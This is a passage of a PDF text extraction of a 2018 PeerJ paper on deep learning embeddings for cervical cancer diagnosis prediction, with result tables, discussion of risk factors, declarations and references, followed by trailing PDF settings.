Type Age int IUD (years) int Number of sexual partners bool � int Sexually transmitted diseases (STDs) (yes/no) bool � bool Age of first sexual intercourse bool � int Number of STDs int Number of pregnancies bool � int Diagnosed STDs Categorical Smokes (yes/no) bool � bool STDs (years since first diagnosis) int Smokes (years and packs) int � int STDs (years last diagnosis) int Hormonal contraceptives (yes/no) bool Previous cervical diagnosis (yes/no) bool Hormonal contraceptives (years) int Previous cervical diagnosis (years) int Intrauterine device (IUD) (yes/no) bool Previous cervical diagnosis Categorical Note: int, integer; bool, boolean. Table 2 Set of possible options for fine-tuning each parameter. Parameter Values Depth {1, : : : , 6} Width {10, 20} Regularization {0.01, 0.1} Bypass usage {false, true} Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 8/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ We used a stratified 10-fold cross-validation in the assessment of the proposed methods. We optimized the neural networks by using the RMSProp optimization strategy (Tieleman & Hinton, 2012) for a maximum number of 500 epochs, with early stopping after 100 iterations without improvement and a batch size of 32. We validated these parameters empirically, and it was enough to ensure model convergence in all cases. We also validated the performance of other optimization strategies such as Adam and stochastic gradient descent. However, we did not observe any gain in terms of predictive performance or convergence. We use sparse autoencoders by adding an L1 penalization term, to ensure that each unit combines a small subset of risk factors, as would be done by a human expert. We fine-tuned all the hyper-parameters using a grid search strategy with nested stratified threefold cross-validation. In this sense, we validated the performance of each network configuration on three training-validation partitions and choose the one that maximizes the area under the PR curve. Then, for the best configuration, we re-trained the model using the entire training set. We chose the size of the low-dimensional space as part of this nested cross-validation procedure, and chose empirically the parameters related to the optimization algorithm (that are strategy, number of epochs, early stopping). To recreate the decisions made by the physician at different configurations of the screening process, we consider the observability of all possible subsets of screening outcomes when predicting the biopsy results. Thereby, we cover scenarios where only behavioral and demographic information is observable (first line of each table with empty subset) up to settings where cytology and colposcopy (Hinselmann and Schiller) results are available. Diagnosis prediction results Our proposed architectures with embedding regularization achieved the best diagnosis prediction results in most cases (Tables 3 and 4) when compared with other neural Table 3 Performance of the proposed architectures in terms of area under the Precision–Recall curve. Subset Baseline Semi Sym Zero SVM k-NN DecTree 0.1334 0.1424 0.1534 0.1744 0.0877 0.0345 0.1941 C 0.1998 0.1853 0.2115 0.2174 0.1550 0.3033 0.2560 H 0.4536 0.4459 0.4407 0.4625 0.4192 0.3885 0.3616 S 0.6416 0.6411 0.6335 0.6668 0.5905 0.5681 0.6242 CH 0.4752 0.4684 0.4754 0.4609 0.4423 0.4095 0.4023 CS 0.6265 0.6424 0.6388 0.5985 0.6205 0.5379 0.6089 HS 0.6200 0.6356 0.6277 0.5864 0.6199 0.6335 0.5956 CHS 0.6665 0.6351 0.6875 0.6404 0.6374 0.6653 0.5542 Best 0 2 2 2 0 1 1 Notes: The subset of observable screening strategies include: Cytology (C), Hinselmann (H), and Schiller (S). Baseline, deep feed-forward neural network; Semi, semi-supervised dimensionality reduction (Eq. 2); Sym, symmetry mapping dimensionality reduction (Eq. 4); Zero, zero mapping dimensionality reduction (Eq. 5); SVM, support vector machine; k-NN, k-nearest neighbors; DecTree, decision tree. We highlight the best performing models in bold. Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 9/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ network approaches. Furthermore, the fully supervised embeddings improved the performance of the semi-supervised approach (Eq. 2), through both the strategies (symmetric and zero mapping). The relative gains in terms of area under the PR curve depend on the subset of observable modalities, ranging from 30.7% when only medical records are observed to 3.3% when the outcome of all the screening procedures is known. Using a paired difference Student’s t-test (Menke & Martinez, 2004) with a 95% confidence level, zero-mapping methodology achieved better results than the baseline and semi-supervised learning schemes. We found no statistical differences between the symmetry and zero mappings. We validated the performance of traditional machine learning models such as support vector machines (SVM) with radial basis function kernel (Scholkopf et al., 1997), k-nearest neighbors (Peterson, 2009), and decision trees (Quinlan, 1986). In general, the proposed models surpassed the performance of the classical methodologies in terms of area under the PR curve. The SVM model achieved better logarithmic loss given the post-processing of its scores using the Logistic Regression model that directly optimize this metric. Further improvements could be observed by post-processing the outcome of the other strategies. The gains achieved by the mapping-based supervised embeddings happen because the proposed fully-supervised strategies aim to reduce the overlap between observations from both classes. In the past, researchers showed that class overlap has higher correlation with the model performance than the imbalance ratio in highly unbalanced datasets (Cruz et al., 2016). The visualization of the embeddings through the t-distributed stochastic neighbor embedding (t-SNE) (Van Der Maaten & Hinton, 2008) confirms this aspect, because in t-SNE fully supervised embeddings achieve better separability and fewer overlapping clusters (Figs. 3–6). Table 4 Performance of the proposed architectures in terms of logarithmic loss. Subset Baseline Semi Sym Zero SVM k-NN DecTree 0.3004 0.2708 0.2657 0.2716 0.2421 4.3670 4.1889 C 0.2829 0.2757 0.2868 0.2609 0.2614 2.6884 3.5001 H 0.2169 0.2274 0.2422 0.2031 0.1984 0.7178 3.2175 S 0.1710 0.1475 0.1489 0.1359 0.1273 0.9366 1.6893 CH 0.2210 0.2054 0.2286 0.2123 0.2196 1.0477 2.8509 CS 0.1594 0.1469 0.1240 0.1464 0.1248 0.4036 1.7687 HS 0.1632 0.1786 0.1615 0.1622 0.1225 0.3238 1.8098 CHS 0.1563 0.1577 0.1494 0.1514 0.1099 0.4037 1.8906 Best 0 1 1 1 4 0 0 Notes: The subset of observable screening strategies include: Cytology (C), Hinselmann (H), and Schiller (S). Area under the Precision–Recall curve. Baseline, deep feed-forward neural network; Semi, semi-supervised dimensionality reduction (Eq. 2); Sym, symmetry mapping dimensionality reduction (Eq. 4); Zero, zero mapping dimensionality reduction (Eq. 5); SVM, support vector machine; k-NN, k-nearest neighbors; DecTree, decision tree. We highlight the best performing models in bold. Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 10/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ Figure 3 Two-dimensional projection of the unsupervised embedding using t-distributed stochastic neighbor embedding (t-SNE) (Van Der Maaten & Hinton, 2008). Full-size DOI: 10.7717/peerj-cs.154/fig-3 Figure 4 Two-dimensional projection of the semi-supervised embedding using t-distributed stochastic neighbor embedding (t-SNE) (Van Der Maaten & Hinton, 2008). Full-size DOI: 10.7717/peerj-cs.154/fig-4 Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 11/20 http://dx.doi.org/10.7717/peerj-cs.154/fig-3 http://dx.doi.org/10.7717/peerj-cs.154/fig-4 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ Figure 5 Two-dimensional projection of the semi-supervised embedding with symmetry mapping using t-distributed stochastic neighbor embedding (t-SNE) (Van Der Maaten & Hinton, 2008). Full-size DOI: 10.7717/peerj-cs.154/fig-5 Figure 6 Two-dimensional projection of the supervised embedding with zero mapping using t-distributed stochastic neighbor embedding (t-SNE) (Van Der Maaten & Hinton, 2008). Full-size DOI: 10.7717/peerj-cs.154/fig-6 Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 12/20 http://dx.doi.org/10.7717/peerj-cs.154/fig-5 http://dx.doi.org/10.7717/peerj-cs.154/fig-6 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ For visualization purposes, we are using t-SNE based upon neighborhood similarities, since learning a valuable representation in a two-dimensional space raises difficulties. Moreover, because of the high dimensionality of our embeddings, their reduction capabilities rely on their sparsity. Results in other applications To observe the impact of our method, we validated the performance of the aforementioned model architectures on several biomedical datasets available on the UC Irvine Machine Learning Repository. Thus, we assessed the model’s performance on nine datasets. The machine learning models we proposed achieved high prediction results, being the zero-mapping approach the best model in most cases (Tables 5 and 6). Table 5 Performance of the proposed architectures on other datasets downloaded from UC Irvine Machine Learning Repository (University of California Irvine, 1987), measured through the area under the Precision–Recall curve. Dataset Baseline Semi Sym Zero Breast cancer Mangasarian, Street & Wolberg (1995) 0.9795 0.9864 0.9835 0.9856 Mammography Elter, Schulz-Wendtland & Wittenberg (2007) 0.8551 0.8539 0.8533 0.8489 Parkinson Little et al. (2007) 0.9517 0.9526 0.9573 0.9604 Pima diabetes Smith et al. (1988) 0.7328 0.7262 0.7095 0.7331 Lung cancer Hong & Yang (1991) 0.7083 0.6042 0.6927 0.8021 Cardiotocography Ayres-de Campos et al. (2000) 0.9948 0.9948 0.9925 0.9958 SPECTF heart Kurgan et al. (2001) 0.9470 0.9492 0.9462 0.9463 Arcene Guyon et al. (2005) 0.8108 0.8433 0.8900 0.8455 Colposcopy QA Fernandes, Cardoso & Fernandes (2017b) 0.7760 0.8122 0.7961 0.8470 Best 1 2 1 5 Note: We highlight the best performing models in bold. Table 6 Performance of the proposed architectures on other datasets downloaded from UC Irvine Machine Learning Repository (University of California Irvine, 1987), measured through logarithmic loss. Dataset Baseline Semi Sym Zero Breast cancer Mangasarian, Street & Wolberg (1995) 0.0984 0.0888 0.0966 0.0930 Mammographic Elter, Schulz-Wendtland & Wittenberg (2007) 0.5122 0.5051 0.4973 0.4822 Parkinson Little et al. (2007) 0.3945 0.4042 0.3883 0.4323 Pima diabetes Smith et al. (1988) 0.5269 0.5229 0.5250 0.5472 Lung cancer Hong & Yang (1991) 1.1083 0.8017 0.6050 0.8328 Cardiotocography Ayres-de Campos et al. (2000) 0.0113 0.0118 0.0116 0.0110 SPECTF heart Kurgan et al. (2001) 0.4107 0.4205 0.4121 0.4196 Arcene Guyon et al. (2005) 1.3516 0.8855 1.0230 1.1518 Colposcopy QA Fernandes, Cardoso & Fernandes (2017b) 0.5429 0.5406 0.5195 0.4850 Best 1 3 2 3 Note: We highlight the best performing models in bold. Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 13/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ This outcome suggests that mapping the majority class to a unique point in the space might improve the learning effectiveness in unbalanced settings. This idea draws a link between binary and one-class classification, and we plan to explore it more in the future. DISCUSSION As shown in the Results section, our deep learning algorithm can predict cervical cancer diagnosis with high accuracy. To further understand the clinical interpretability of our prediction model, we investigated which dataset risk features have the highest impact in the cervical cancer diagnosis for the patients. Figure 7 Agglomerative clustering of features by impact on the embedding space. Full-size DOI: 10.7717/peerj-cs.154/fig-7 Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 14/20 http://dx.doi.org/10.7717/peerj-cs.154/fig-7 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ In fact, pre-invasive intra-epithelial lesions of the cervix and cervical cancer relate to HPV infection of oncological serotypes that progress to oncological lesions, and multiple factors contribute to this progress without a definite cause-dependent relation. The patterns that have highest acceptance in the literature regard presence of human immunodeficiency virus and smoking, followed by sexual risk behaviors such as early sexual initiation, promiscuity, multiple pregnancies, and a history of sexually transmitted infections. Another factor involved is the use of oral contraceptives. From a technical point of view, while black-box machine learning techniques have achieved state-of-the-art results in several applications, the lack of interpretability of the induced models can limit their general acceptance by the medical community. Thus, we tried to understand the relationships by using our prediction model to corroborate if they are supported by the medical literature. In this context, we studied the impact of the original features on the embedding space to find correlations in the decision process. To determine this impact, we perturbed each feature using all the other values from the feature’s domain, and then we computed the maximum impact of the features in the embedded space. Finally, we applied an agglomerative clustering technique to aggregate features with similar impact in the embedding features. From a medical point of view, we validated several properties of interest (Fig. 7). For instance, risky sexual patterns such as an early sexual initiation and the presence (and lifespan) of STDs (with a special focus on HPV) have the most similar impact in the predictive outcome of the model. Also, smoking habits are associated by the model as having a similar effect as these sexual patterns. These relationships were already studied in the medical literature (Louie et al., 2009; Deacon et al., 2000). The similarity between the use of hormonal contraceptives with condylomatosis and the use of intrauterine devices with STDs shows another interesting pattern that has not been quantified yet to the best of our knowledge. These patterns might be evidence of sexual patterns with high risk. CONCLUSION Cervical cancer is still a widespread disease nowadays, and its diagnosis often requires frequent and very time-consuming clinical exams. In this context, machine learning can provide effective tools to speed up the diagnosis process, by processing high-scale patients’ datasets in a few minutes. In this manuscript, we presented a computational system for the prediction of cervical patient diagnosis, and for the interpretation of its results. Our system consists of a loss function that allows joint optimization of dimensionality reduction, and classification techniques able to promote relevant properties in the embedded spaces. Our deep learning methods predicted the diagnosis of the patients with high accuracy, and their application to other datasets showed that their robustness and effectiveness is not bounded to cervical cancer. Our methods can be used to analyze profiles of patients where the biopsy and potentially other screening results are missing, and are able to predict confidently if they have cervical cancer. Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 15/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ In the future, we plan to employ alternative approaches for data missing imputation, such as oversampling through k-nearest neighbors (Santos et al., 2015) or latent semantic indexing similarity (Chicco & Masseroli, 2015). We also plan to try alternative prediction models, like probabilistic latent semantic analysis (Pinoli, Chicco & Masseroli, 2015). Finally, we plan to extend our computational system by adding a feature selection step, able to state the most relevant features among the dataset. ACKNOWLEDGEMENTS The authors thank the Gynecology Service of the Hospital Universitario de Caracas, and Francis Nguyen (Princess Margaret Cancer Centre) for the English proof-reading of this manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was funded by the Project “NanoSTIMA: Macro-to-Nano Human Sensing: Towards Integrated Multimodal Health Monitoring and Analytics/NORTE-01-0145- FEDER-000016” financed by the North Portugal Regional Operational Programme (NORTE 2020), under the PORTUGAL 2020 Partnership Agreement, and through the European Regional Development Fund (ERDF), and also by Fundacao para a Ciencia e a Tecnologia (FCT) within the PhD grant number SFRH/BD/93012/2013. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: NanoSTIMA: Macro-to-Nano Human Sensing: Towards Integrated Multimodal Health Monitoring and Analytics: NORTE-01-0145-FEDER-000016. North Portugal Regional Operational Programme: NORTE 2020. PORTUGAL 2020 Partnership Agreement. European Regional Development Fund (ERDF). Fundacao para a Ciencia e a Tecnologia (FCT): SFRH/BD/93012/2013. Competing Interests The authors declare that they have no competing interests. Author Contributions � Kelwin Fernandes conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Davide Chicco conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 16/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ � Jaime S. Cardoso conceived and designed the experiments, contributed reagents/ materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, proposed parts of the general strategy of the project. � Jessica Fernandes analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, construction of the dataset and domain expertise about the application. Data Availability The following information was supplied regarding data availability: The dataset is publicly available at the University of California, Irvine Machine Learning Repository: https://archive.ics.uci.edu/ml/datasets/Cervical+cancer+%28Risk +Factors%29 The dataset is also available at Github: https://github.com/kelwinfc/cervical-cancer- screening/tree/master/risk-factors/data The software code of the methods used in the project is available at Github: https:// github.com/kelwinfc/cervical-cancer-screening/ We implemented the software in Python 2.7 using the Keras (Chollet, 2015) and TensorFlow (Abadi et al., 2016) frameworks, and tested it on a computer running the Linux Ubuntu 16.04 operating system. REFERENCES Abadi M, Barham P, Chen J, Chen Z, Davis A, Dean J, Devin M, Ghemawat S, Irving G, Isard M, Kudlur M, Levenberg J, Monga R, Moore S, Murray DG, Steiner B, Tucker P, Vasudevan V, Warden P, Wicke M, Yu Y, Zheng X, Google Brain. 2016. TensorFlow: a system for large-scale machine learning. In: Proceedings of the 12th USENIX Symposium on Operating Systems Design and Implementation (OSDI 2016), Savannah, GA, USA. Vol. 16, 265–283. Alipanahi B, Delong A, Weirauch MT, Frey BJ. 2015. Predicting the sequence specificities of DNA- and RNA-binding proteins by deep learning. Nature Biotechnology 33(8):831–838 DOI 10.1038/nbt.3300. Ayres-de Campos D, Bernardes J, Garrido A, Marques-de Sa J, Pereira-Leite L. 2000. Sisporto 2.0: a program for automated analysis of cardiotocograms. Journal of Maternal-Fetal Medicine 9(5):311–318 DOI 10.3109/14767050009053454. Bessa S, Domingues I, Cardosos JS, Passarinho P, Cardoso P, Rodrigues V, Lage F. 2014. Normal breast identification in screening mammography: a study on 18,000 images. In: 2014 IEEE International Conference on Bioinformatics and Biomedicine (BIBM). Belfast: IEEE, 325–330. Cangelosi D, Pelassa S, Morini M, Conte M, Bosco MC, Eva A, Sementa AR, Varesio L. 2016. Artificial neural network classifier predicts neuroblastoma patients’ outcome. BMC Bioinformatics 17(12):83. Centers for Disease Control and Prevention (CDC). 2013. Cervical cancer screening among women aged 18–30 years—United States, 2000–2010. Morbidity and Mortality Weekly Report 61(51–52):1038. Chicco D. 2017. Ten quick tips for machine learning in computational biology. BioData Mining 10(1):35 DOI 10.1186/s13040-017-0155-3. Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 17/20 https://archive.ics.uci.edu/ml/datasets/Cervical+cancer+%28Risk+Factors%29 https://archive.ics.uci.edu/ml/datasets/Cervical+cancer+%28Risk+Factors%29 https://github.com/kelwinfc/cervical-cancer-screening/tree/master/risk-factors/data https://github.com/kelwinfc/cervical-cancer-screening/tree/master/risk-factors/data https://github.com/kelwinfc/cervical-cancer-screening/ https://github.com/kelwinfc/cervical-cancer-screening/ http://dx.doi.org/10.1038/nbt.3300 http://dx.doi.org/10.3109/14767050009053454 http://dx.doi.org/10.1186/s13040-017-0155-3 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ Chicco D, Masseroli M. 2015. Software suite for gene and protein annotation prediction and similarity search. IEEE/ACM Transactions on Computational Biology and Bioinformatics 12(4):837–843 DOI 10.1109/tcbb.2014.2382127. Chicco D, Sadowski P, Baldi P. 2014. Deep autoencoder neural networks for Gene Ontology annotation predictions. In: Proceedings of ACM BCB 2014. Newport Beach: ACM, 533–540. Chollet F. 2015. Keras. Available at https://github.com/keras-team/keras. Cruz R, Fernandes K, Cardoso JS, Costa JFP. 2016. Tackling class imbalance with ranking. In: The 2016 International Joint Conference on Neural Networks. Vancouver: IEEE, 2182–2187. Davis J, Goadrich M. 2006. The relationship between precision-recall and ROC curves. In: Proceedings of the 23rd International Conference on Machine Learning. Pittsburgh: ACM, 233–240. Deacon JM, Evans CD, Yule R, Desai M, Binns W, Taylor C, Peto J. 2000. Sexual behaviour and smoking as determinants of cervical HPV infection and of CIN3 among those infected: a case– control study nested within the Manchester cohort. British Journal of Cancer 83(11):1565–1572 DOI 10.1054/bjoc.2000.1523. Elter M, Schulz-Wendtland R, Wittenberg T. 2007. The prediction of breast cancer biopsy outcomes using two CAD approaches that both emphasize an intelligible decision process. Medical Physics 34(11):4164–4172 DOI 10.1118/1.2786864. Fernandes K, Cardoso JS, Astrup BS. 2017a. Automated detection and categorization of genital injuries using digital colposcopy. In: Alexandre L, Salvador Sánchez J, Rodrigues J, eds. Iberian Conference on Pattern Recognition and Image Analysis. Faro: Springer, 251–258. Fernandes K, Cardoso JS, Fernandes J. 2017b. Transfer learning with partial observability applied to cervical cancer screening. In: Alexandre L, Salvador Sánchez J, Rodrigues J, eds. Iberian Conference on Pattern Recognition and Image Analysis. Faro: Springer, 243–250. Fernandes K, Cardoso JS, Fernandes J. 2015. Temporal segmentation of digital colposcopies. In: Paredes R, Cardoso J, Pardo X, eds. Iberian Conference on Pattern Recognition and Image Analysis. Santiago de Compostela: Springer, 262–271. Graffar M. 1956. Une méthode de classification sociale d’échantillons de population. Courrier 6(8):455–459. Guyon I, Gunn S, Ben-Hur A, Dror G. 2005. Result analysis of the nips 2003 feature selection challenge. In: Weiss Y, Schölkopf B, Platt JC, eds. Advances in Neural Information Processing Systems. Vancouver: Neural Information Processing Systems Foundation, 545–552. He K, Zhang X, Ren S, Sun J. 2015. Delving deep into rectifiers: Surpassing human-level performance on imagenet classification. In: Proceedings of IEEE ICCV 2015, Santiago, Chile, 1026–1034. Hong Z-Q, Yang J-Y. 1991. Optimal discriminant plane for a small number of samples and design method of classifier on the plane. Pattern Recognition 24(4):317–324 DOI 10.1016/0031-3203(91)90074-f. Kauffman RP, Griffin SJ, Lund JD, Tullar PE. 2013. Current recommendations for cervical cancer screening: do they render the annual pelvic examination obsolete? Medical Principles and Practice 22(4):313–322 DOI 10.1159/000346137. Kiros R, Salakhutdinov R, Zemel RS. 2014. Unifying visual-semantic embeddings with multimodal neural language models. Available at http://arxiv.org/abs/1411.2539. Kurgan LA, Cios KJ, Tadeusiewicz R, Ogiela M, Goodenday LS. 2001. Knowledge discovery approach to automated cardiac SPECT diagnosis. Artificial Intelligence in Medicine 23(2):149–169 DOI 10.1016/s0933-3657(01)00082-3. Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 18/20 http://dx.doi.org/10.1109/tcbb.2014.2382127 https://github.com/keras-team/keras http://dx.doi.org/10.1054/bjoc.2000.1523 http://dx.doi.org/10.1118/1.2786864 http://dx.doi.org/10.1016/0031-3203(91)90074-f http://dx.doi.org/10.1159/000346137 http://arxiv.org/abs/1411.2539 http://dx.doi.org/10.1016/s0933-3657(01)00082-3 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ Lacoste-Julien S, Sha F, Jordan MI. 2009. Disclda: discriminative learning for dimensionality reduction and classification. In: Bengio Y, Schuurmans D, Lafferty JD, Williams CKI, Culotta A, eds. Advances in Neural Information Processing Systems. Vancouver: Neural Information Processing Systems Foundation, 897–904. LeCun Y, Bengio Y, Hinton G. 2015. Deep learning. Nature 521(7553):436–444 DOI 10.1038/nature14539. Levy O, Goldberg Y, Ramat-Gan I. 2014. Linguistic regularities in sparse and explicit word representations. In: Morante R, Yih SW, eds. CoNLL. Baltimore: Association for Computational Linguistics, 171–180. Li W, Prasad S, Fowler JE, Bruce LM. 2012. Locality-preserving dimensionality reduction and classification for hyperspectral image analysis. IEEE Transactions on Geoscience and Remote Sensing 50(4):1185–1198 DOI 10.1109/tgrs.2011.2165957. Little MA, McSharry PE, Roberts SJ, Costello DA, Moroz IM. 2007. Exploiting nonlinear recurrence and fractal scaling properties for voice disorder detection. Biomedical Engineering Online 6(1):23 DOI 10.1186/1475-925x-6-23. Louie KS, De Sanjose S, Diaz M, Castellsague X, Herrero R, Meijer CJ, Shah K, Franceschi S, Munoz N, Bosch FX. 2009. Early age at first sexual intercourse and early pregnancy are risk factors for cervical cancer in developing countries. British Journal of Cancer 100(7):1191–1197 DOI 10.1038/sj.bjc.6604974. Mangasarian OL, Street WN, Wolberg WH. 1995. Breast cancer diagnosis and prognosis via linear programming. Operations Research 43(4):570–577 DOI 10.1287/opre.43.4.570. Menke J, Martinez TR. 2004. Using permutations instead of student’s t distribution for p-values in paired-difference algorithm comparisons. In: 2004 IEEE International Joint Conference on Neural Networks, Proceedings. Vol. 2. Budapest: IEEE, 1331–1335. Moore JH. 2004. Computational analysis of gene-gene interactions using multifactor dimensionality reduction. Expert Review of Molecular Diagnostics 4(6):795–803 DOI 10.1586/14737159.4.6.795. Peterson LE. 2009. K-nearest neighbor. Scholarpedia 4(2):1883 DOI 10.4249/scholarpedia.1883. Pinoli P, Chicco D, Masseroli M. 2015. Computational algorithms to predict gene ontology annotations. BMC Bioinformatics 16(Suppl. 6):S4 DOI 10.1186/1471-2105-16-s6-s4. Plissiti ME, Nikou C. 2013. A review of automated techniques for cervical cell image analysis and classification. In: Andreaus U, Iacoviello D, eds. Biomedical Imaging and Computational Modeling in Biomechanics. Dordrecht: Springer, 1–18. Quinlan JR. 1986. Induction of decision trees. Machine Learning 1(1):81–106 DOI 10.1007/bf00116251. Ronneberger O, Fischer P, Brox T. 2015. U-net: convolutional networks for biomedical image segmentation. In: International Conference on Medical Image Computing and Computer-Assisted Intervention. Munich: Springer, 234–241. Santos MS, Abreu PH, Garca-Laencina PJ, Simão A, Carvalho A. 2015. A new cluster-based oversampling method for improving survival prediction of hepatocellular carcinoma patients. Journal of Biomedical Informatics 58:49–59 DOI 10.1016/j.jbi.2015.09.012. Scholkopf B, Sung K-K, Burges CJ, Girosi F, Niyogi P, Poggio T, Vapnik V. 1997. Comparing support vector machines with Gaussian kernels to radial basis function classifiers. IEEE Transactions on Signal Processing 45(11):2758–2765 DOI 10.1109/78.650102. Smith JW, Everhart J, Dickson W, Knowler W, Johannes R. 1988. Using the ADAP learning algorithm to forecast the onset of diabetes mellitus. In: Proceedings of the Annual Symposium on Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 19/20 http://dx.doi.org/10.1038/nature14539 http://dx.doi.org/10.1109/tgrs.2011.2165957 http://dx.doi.org/10.1186/1475-925x-6-23 http://dx.doi.org/10.1038/sj.bjc.6604974 http://dx.doi.org/10.1287/opre.43.4.570 http://dx.doi.org/10.1586/14737159.4.6.795 http://dx.doi.org/10.4249/scholarpedia.1883 http://dx.doi.org/10.1186/1471-2105-16-s6-s4 http://dx.doi.org/10.1007/bf00116251 http://dx.doi.org/10.1016/j.jbi.2015.09.012 http://dx.doi.org/10.1109/78.650102 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ Computer Application in Medical Care. New York: American Medical Informatics Association, 261. Srivastava N, Hinton GE, Krizhevsky A, Sutskever I, Salakhutdinov R. 2014. Dropout: a simple way to prevent neural networks from overfitting. Journal of Machine Learning Research 15(1):1929–1958. Tieleman T, Hinton G. 2012. Lecture 6.5—rmsprop: divide the gradient by a running average of its recent magnitude. Coursera: Neural Networks for Machine Learning 4(2):26–31. University of California Irvine. 1987. Machine Learning Repository. Available at http://archive.ics. uci.edu/ml/ (accessed 10 August 2017). University of California Irvine Machine Learning Repository. 2017. Cervical Cancer (Risk Factors) Data Set. Available at https://archive.ics.uci.edu/ml/datasets/Cervical+cancer+%28Risk +Factors%29 (accessed 1 February 2018). Van Der Maaten L, Hinton G. 2008. Visualizing data using t-SNE. Journal of Machine Learning Research 9:2579–2605. Van Der Maaten L, Postma E, Van den Herik J. 2009. Dimensionality reduction: a comparative. Journal of Machine Learning Research 10:66–71. Vincent P, Larochelle H, Bengio Y, Manzagol P-A. 2008. Extracting and composing robust features with denoising autoencoders. In: Proceedings of ICML 2008. Helsinki: ACM, 1096–1103. Xu T, Zhang H, Huang X, Zhang S, Metaxas DN. 2016. Multimodal deep learning for cervical dysplasia diagnosis. In: International Conference on Medical Image Computing and Computer- Assisted Intervention. Athens: Springer, 115–123. Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 20/20 http://archive.ics.uci.edu/ml/ http://archive.ics.uci.edu/ml/ https://archive.ics.uci.edu/ml/datasets/Cervical+cancer+%28Risk+Factors%29 https://archive.ics.uci.edu/ml/datasets/Cervical+cancer+%28Risk+Factors%29 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ Supervised deep learning embeddings for the prediction of cervical cancer diagnosis Introduction Methods Dataset Results Discussion Conclusion flink7 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> 